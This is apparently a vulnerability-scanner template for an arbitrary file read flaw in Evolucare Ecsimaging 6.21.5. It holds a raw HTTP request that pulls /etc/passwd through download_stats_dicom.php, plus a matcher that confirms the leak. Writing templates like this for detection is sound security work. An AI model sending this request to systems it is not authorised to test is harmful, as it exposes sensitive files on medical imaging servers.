id: evolucare-ecsimaging-file-download

info:
  name: Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞
  author: daffainfo
  severity: high
  description: |
    Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5
    body="ECSimaging"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Evolucare%20Ecsimaging%20download_stats_dicom.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md


http:
  - raw:
      - |
        GET /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd HTTP/1.1
        Host: {{Hostname}}
      
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && regex('root:.*:0', body_1)"
        condition: and
